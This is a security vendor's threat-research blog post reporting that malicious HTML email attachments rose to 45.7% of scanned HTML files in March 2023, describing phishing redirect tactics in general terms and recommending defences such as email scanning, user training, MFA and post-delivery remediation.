Threat spotlight: Malicious HTML attachments double

The security industry has been highlighting the cybercriminal misuse of HTML (Hypertext Markup Language) for years — and evidence suggests it remains a successful and popular attack tool. Last year we reported that around one in five (21%) of all HTML attachments scanned by Barracuda in May 2022 were malicious. Ten months on, that figure has more than doubled — 45.7% of scanned HTML files were found to be malicious in March 2023.

Malicious HTML detections by month.

The legitimate use of HTML

HTML is used to create and structure content that is displayed online. HTML is also commonly used in email communication — for example, in automated reports that users might be receiving on a regular basis, such as newsletters, marketing materials and more. In many cases, reports are attached to an email in HTML format (with the file extension .html, .htm or .xhtml, for example).

If the communication appears to come from a known or trusted brand, the recipient is unlikely to be suspicious.

The malicious use of HTML 

However, attackers can successfully leverage HTML as an attack technique by using well-crafted messages and/or compromised websites and malicious HTML file attachments to trick users. This approach is used by attackers to conceal malicious intentions such as phishing and credential theft, and more.

If a recipient opens the HTML file, multiple redirects via JavaScript libraries hosted elsewhere will take them to a phishing site or other malicious content controlled by the attackers. Users are then asked to enter their credentials to access information or download a file that may contain malware.

However, in some of cases seen by Barracuda researchers, the HTML file itself includes sophisticated malware which has the complete malicious payload embedded within it, including potent scripts and executables. This attack technique is becoming more widely used than those involving externally hosted JavaScript files.

Protection against malicious HTML-based attacks should take into account the entire email carrying HTML attachments, looking at all redirects and analysing the content of the email for malicious intent. More on that below.

Recent examples of malicious HTML attachments are often similar to those seen in the past, in that they mirror common logins — such as Microsoft. Their continued and widespread use in attacks suggests attackers remain successful in trapping victims.

Proportion of unique attacks

If you compare the total number of malicious HTML detections to how many different (unique) files were detected, it becomes clear that the growing volume of malicious files detected is not simply the result of a limited number of mass attacks, but the result of many different attacks each using specially crafted files.

For example, daily detection data for the three months from January to March 2023 reveals two significant attack peaks, on 7 March and 23 March. 

On 7 March, there were 672,145 malicious HTML artifacts detected in total, comprising 181,176 different items. This means that around a quarter (27%) of the detected files were unique and the rest were repeat or mass deployments of those files.

However, on March 23, almost nine in ten (405,438 — 85%) of the total 475,938 malicious HTML artefacts were unique ― which means that almost every single attack was different.

HTML attachments continue to dominate the list of file types used for malicious purposes

Barracuda analysis further shows that not only is the overall volume of malicious HTML attachments increasing, nearly a year on from our last report, HTML attachments remain the file type most likely to be used for malicious purposes.

Artifacts by type in March 2023.

When it comes to attack tactics and tools, the fact that something has been around for a while doesn’t appear to make it any less potent. Malicious HTML is still being used by attackers because it works. Getting the right security in place is as important now as it has ever been, if not more so.

How to protect against malicious HTML attachments

• Email protection — It is essential to have effective email protection in place and ensure that your security scanning can identify and block malicious HTML attachments. Because these are not always easy to identify for the reasons above, the best solutions will include machine learning and static code analysis that will evaluate the content of an email and not just an attachment.
• User education and awareness — Train people to spot and report potentially malicious HTML attachments. Given the volume and diversity of these type of attacks, it’s probably good to be wary of all HTML attachments, especially those coming from sources they haven’t seen before. Remind people not to share their login credentials with anyone, ever.
• Robust authentication and access controls  — Multifactor authentication (MFA) remains a good access control, but attackers are increasingly turning to advanced social engineering techniques, such as MFA fatigue, to bypass many types of MFA protection. Consider turning to Zero Trust Access measures to enhance security. An effective Zero Trust solution such as Barracuda CloudGen Access dynamically monitors multiple parameters — user, device, location, time, resources being accessed and more — which makes it much more difficult for attackers to compromise your network using stolen credentials.
• If a malicious HTML file does get through — Make sure you have post-delivery remediation tools to quickly identify and remove malicious emails from all user inboxes. An automated incident response can help to do this before the attack spreads through an organisation. In addition, account takeover protection can monitor and alert you to any suspicious account activity if login credentials were to be compromised.
   

Fleming Shi is Chief Technology Officer at Barracuda, where he leads the company’s threat research and innovation engineering teams in building future technology platforms. He has more than 20 patents granted or pending in network and content security.

Image credit: iStock.com/photovibes